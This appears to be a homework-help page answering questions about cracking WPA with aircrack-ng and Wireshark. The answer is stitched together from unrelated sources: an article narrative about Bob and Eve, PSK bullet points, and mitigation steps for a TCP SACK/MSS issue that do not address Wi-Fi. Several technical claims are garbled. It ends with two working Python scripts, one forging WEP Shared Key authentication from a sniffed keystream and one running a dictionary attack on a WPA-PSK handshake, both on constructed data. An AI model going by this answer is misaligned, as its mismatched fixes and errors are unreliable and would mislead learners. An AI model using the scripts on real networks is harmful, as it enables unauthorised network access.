Question

In: Computer Science


These questions ONLY relate to the Cracking WPA

What vulnerabilities were demonstrated by using aircrack-ng?

What vulnerabilities were demonstrated by using aircrack-ng in Wireshark?

What would you tell the server administrator to do to mitigate the vulnerability from aircrack-ng?

What would you tell the server administrator to do to mitigate the vulnerability from Wireshark?

Solutions

Expert Solution

1. Aircrack-ng is not a single tool, but rather a suite of tools that can be used to hack a wireless network. In this article, though, it is used to secure a wireless network by discovering its vulnerabilities.

Security in networks is very vital for small as well as large organisations. Not only does it help in maintaining the confidentiality of clients' and employers' data, but it is also important for retaining trade secrets to overcome competition. Wireless networks form an important mode of communication, as wired networks tend to incur more infrastructure costs. But are wireless networks sufficiently secure? Let's have a look at a common scenario.

Wired Equivalent Privacy (WEP)
This algorithm is based on the RC4 stream cipher and CRC checksum mechanism to provide confidentiality and integrity. Open System authentication and Shared Key authentication are the two methods of authentication used in WEP.
1. Open System authentication: In this case, the WLAN client need not provide its credentials to the access point during authentication. Any client can authenticate with the access point.

2. Shared Key authentication: In this authentication mechanism as shown in figure 1, the WEP key is used for authentication in a four-step handshake process:
a. The client sends an authentication request to the access point.
b. The access point responds to the request with a clear-text challenge.
c. The client encrypts the challenge-text using the configured WEP key and sends the encrypted message to the access point.
d. The access point decrypts the response and verifies if the decrypted text matches the challenge-text. It authenticates the client if the match is found.
In spite of the mechanisms used, this algorithm has a number of vulnerabilities and can be easily cracked. Various techniques, based on brute force attacks and analysis of the IVs (initialisation vectors), were discovered that led to deprecation of this algorithm.

Figure 2: WPA technique

Wi-Fi Protected Access (WPA)
WPA is a more secure algorithm that was developed in 2003 to address a few of the vulnerabilities that existed in WEP. WPA is mainly based on TKIP (temporal key integrity protocol), which uses a unique encryption key for each data packet sent over the network. The pre-shared key (PSK) used in TKIP is a 256-bit entity used for authentication. Figure 2 gives diagrammatic representation of WPA algorithm.

WPA is much more secure than WEP. This is because in the case of the latter, every data packet has the same key, which can be easy to find by capturing a sufficient number of packets. In WPA, it's difficult to get the key because every data packet has a unique key. But there are also a few loopholes that can be exploited. WPA can be compromised using Denial of Service attacks.

Wi-Fi Protected Access II (WPA2)
WPA2, also known as RSN (robust security network), is the most recent and highly secure algorithm, which enforces mandatory usage of the AES (advanced encryption standard). Another significant security enhancement has been the introduction of CCMP [counter mode with CBC (cipher block chaining) MAC (message authentication code) protocol]. CCMP uses AES instead of TKIP as the underlying encryption mechanism and, hence, prevents various attacks that were designed based on the RC4 cipher used in TKIP.

After some research, Eve concludes that WPA2 is secure enough to get rid of the kind of attacks Bob's office suffers from and, hence, configures the entire network over WPA2. Yet, even after such heightened countermeasures, Bob's network again gets compromised by some mischievous attackers. Alarmed at the situation, he again contacts Eve for help. During her research, she comes across one such tool that suits her needs. She advises Bob to use Aircrack-ng to internally spot the weak access points and enhance his network's security to avoid future attacks. Since Bob is unaware of the functionality of Aircrack-ng, Eve provides a brief overview.

Aircrack-ng stands for Aircrack new generation and is an advanced network auditing software used for sniffing and cracking wireless networks. It is mainly used for testing the weaknesses of wireless networks by breaking into the network using the WEP and WPA-PSK keys recovered by decrypting the gathered encrypted packets. This tool can be used across Linux as well as Windows platforms, but has limited support in Windows.

The block diagram given in Figure 3 gives a brief description of the tool.
Bob is determined to patch up the weak links in his network; so he asks Eve to demonstrate how the tool is used to prevent various attacks. Eve tells him how to install the tool on the Ubuntu 14.04 platform and then gives the procedure to detect the vulnerable access points.

2. PSK vulnerability

• In WPA the master key is used to generate transient session keys.
• With PSK, all devices are configured with the same passphrase (or password) that serves as the master key.
• Like any other password, the strength of the passphrase determines if it can be guessed using a dictionary attack.
• Once the passphrase is guessed, an attacker can generate transient keys to decrypt all traffic.
• WPA-PSK and WPA2-PSK (also known as WPA-Personal, WPA2-Personal) are vulnerable to dictionary attack.

3. The only way to mitigate attacks against WEP networks was to pretty much re-invent the wheel. In the meanwhile, people started to implement some “restrictive” features to only allow “authorized” personnel into the networks. One of these attempts was a simple MAC filtering technique: while the WEP attack was thwarted by the use of WEP 128 and above, people still knew that hackers would get in, so they thought they would add a layer of security by only allowing MAC-authorized clients to join the network. This is a pain to actually manage, and more trouble than it is really worth, since it would take an attacker all but a few extra seconds to change their MAC address to impersonate some client who is already connected and has authority to use the network. The attacker can now freely impersonate the other person on the network and connect to it freely; MAC filtering proved to do much of nothing at all.

The next failed mitigation technique was “hiding SSIDs”. We’ve all needed to connect to a hidden SSID in our day; it can be somewhat inconvenient, typing the SSID name and then the password. The problem with this is that SSIDs were not constructed to be hidden; therefore, one could fire up Wireshark, monitor the air around them, and essentially see what the SSID name is via a client connecting to it who is broadcasting probes.

4. To prevent your systems from being vulnerable to these attacks and improve their security, it is essential to apply one of the following fixes:

Fix #0: Patch your system.

Make sure you apply the latest patches available here or simply run the following command:

$ sudo apt-get dist-upgrade

Fix #1: Block connections with low MSS using filters.

These filters may break legitimate connections that rely on this setting, so practice caution when applying them.

$ iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP

Fix #2: Disable SACK processing

To do this, you have to be a superuser, because regular admin users don’t have the permission to change this value.

$ echo 0 > /proc/sys/net/ipv4/tcp_sack
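The Shared Key authentication handshake described in the answer above, worked through as an added example (not part of the original answer and not aircrack-ng's code): a legitimate client answers the access point's clear-text challenge, an eavesdropper XORs that known challenge with the encrypted response to recover the RC4 keystream for that IV, and then reuses the same IV and keystream to pass a fresh challenge without ever learning the key. The WEP key, the IV and both challenge texts are constructed for the demonstration; the only details taken from the protocol are the frame layout (3-byte IV, RC4 seeded with IV || key, CRC-32 ICV appended before encryption) and the fact that WEP lets a station choose any IV, including one that has already been used.

```python
"""WEP Shared Key authentication: keystream recovery and forged response (constructed data)."""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). WEP seeds it with IV || key for every frame."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as a legitimate station sends it: IV || RC4(IV||key, plaintext || ICV)."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Access point side: strip IV, decrypt, split off and verify the ICV."""
    iv, ciphertext = frame[:3], frame[3:]
    plaintext = rc4(iv + key, ciphertext)
    body, tag = plaintext[:-4], plaintext[-4:]
    return body, icv(body) == tag


def ap_verify_response(key: bytes, challenge: bytes, response: bytes) -> bool:
    """Step d of the handshake: accept only if the ICV checks and the text matches."""
    body, ok = wep_decrypt(key, response)
    return ok and body == challenge


def recover_keystream(challenge: bytes, response: bytes):
    """Attacker: the challenge (step b) was sent in the clear, so challenge||ICV XOR
    ciphertext is the RC4 keystream for this IV, 132 bytes of it."""
    iv, ciphertext = response[:3], response[3:]
    known = challenge + icv(challenge)
    return iv, bytes(a ^ b for a, b in zip(known, ciphertext))


def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Attacker answers a later challenge with the leaked IV/keystream pair; no key needed."""
    plaintext = new_challenge + icv(new_challenge)
    assert len(plaintext) <= len(keystream), "keystream too short for this challenge"
    return iv + bytes(a ^ b for a, b in zip(plaintext, keystream))


# Constructed demonstration data; the attacker is never given WEP_KEY.
WEP_KEY = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit key
IV = b"\x01\x02\x03"                                    # constructed IV chosen by the station
CHALLENGE_1 = bytes(range(128))                         # constructed 128-byte challenge, observed
CHALLENGE_2 = bytes(range(255, 127, -1))                # constructed later challenge to the attacker


def demo() -> bool:
    """Returns True if the AP accepts the attacker's forged response."""
    response_1 = wep_encrypt(WEP_KEY, IV, CHALLENGE_1)          # legitimate client, step c
    assert ap_verify_response(WEP_KEY, CHALLENGE_1, response_1)  # AP accepts it, step d
    iv, keystream = recover_keystream(CHALLENGE_1, response_1)   # eavesdropper
    forged = forge_response(iv, keystream, CHALLENGE_2)          # attacker's own step c
    return ap_verify_response(WEP_KEY, CHALLENGE_2, forged)


if __name__ == "__main__":
    print("forged authentication accepted:", demo())
```

demo() returns True: the access point, which holds the real key, accepts a response built by a party that never saw the key. This is why Shared Key authentication is actually weaker than Open System authentication, and why recovering the key itself (the IV-analysis attacks mentioned in the answer) is not even necessary to join a WEP network.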

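The PSK dictionary attack from point 2 of the answer, as an added example that is not part of the original answer and not aircrack-ng's own code: for each candidate word it derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), expands the PMK into the PTK with the IEEE 802.11 PRF using the two MAC addresses and two nonces (all of which are sent in the clear), and compares the HMAC-SHA1 MIC it computes over message 2 of the four-way handshake with the one in the capture. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed; the EAPOL-Key frame is built by the code itself with key descriptor version 2 (HMAC-SHA1-128, the WPA2-CCMP case) rather than parsed from a pcap, and the "captured" MIC is produced by the same functions playing the legitimate client. A real capture supplies exactly those fields and nothing more.

```python
"""Dictionary attack on a WPA/WPA2-PSK four-way handshake (constructed capture)."""
import hashlib
import hmac
import struct

# Constructed network and handshake parameters; everything here is visible to a sniffer.
SSID = "CorpWiFi"                         # constructed network name
AP_MAC = bytes.fromhex("001122334455")    # constructed authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")   # constructed supplicant address (SPA)
ANONCE = bytes(range(32))                 # constructed ANonce from message 1
SNONCE = bytes(range(100, 132))           # constructed SNonce from message 2
TRUE_PASSPHRASE = "password123"           # constructed: the weak PSK the network really uses
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of Key Descriptor fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes). The only costly step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11 PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key frame (message 2 of 4) with the MIC field zeroed.
    Key Information 0x010A = descriptor version 2 (HMAC-SHA1-128), pairwise key, MIC bit set."""
    body = struct.pack(">BHH", 2, 0x010A, 0)       # descriptor type 2 (RSN), key info, key length
    body += struct.pack(">Q", replay_counter)      # replay counter
    body += snonce                                 # key nonce (SNonce)
    body += b"\x00" * 16                           # key IV
    body += b"\x00" * 8                            # key RSC
    body += b"\x00" * 8                            # key ID (reserved)
    body += b"\x00" * 16                           # MIC, zero while it is being computed
    body += struct.pack(">H", 0)                   # key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body   # EAPOL version 1, type 3 (Key)


def compute_mic(passphrase, ssid, aa, spa, anonce, snonce, eapol_zeroed: bytes) -> bytes:
    """KCK = PTK[0:16]; for descriptor version 2 the MIC is HMAC-SHA1(KCK, frame)[:16]."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


# What the legitimate client transmitted: the frame above with the real MIC filled in.
EAPOL_MSG2_ZEROED = build_eapol_msg2(SNONCE)
CAPTURED_MIC = compute_mic(TRUE_PASSPHRASE, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2_ZEROED)
CAPTURED_MSG2 = EAPOL_MSG2_ZEROED[:MIC_OFFSET] + CAPTURED_MIC + EAPOL_MSG2_ZEROED[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, captured_msg2: bytes, wordlist):
    """aircrack-ng's WPA mode in miniature: derive PMK -> PTK -> MIC per candidate and
    compare with the captured MIC. Returns the passphrase, or None if no word matches."""
    mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + b"\x00" * 16 + captured_msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        if hmac.compare_digest(compute_mic(candidate, ssid, aa, spa, anonce, snonce, zeroed), mic):
            return candidate
    return None


WORDLIST = ["letmein", "Summer2019", "password123", "correcthorsebatterystaple"]  # constructed

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

Every candidate costs 4096 HMAC-SHA1 iterations for the PMK plus a few more for the PTK and MIC, and nothing else in the derivation is secret, so the attacker's work is bounded only by the passphrase's entropy. That is the mitigation for WPA-Personal in concrete terms: a long random passphrase instead of a dictionary word, a non-default SSID so precomputed PMK tables do not apply, or WPA2-Enterprise (802.1X), where there is no shared passphrase to guess.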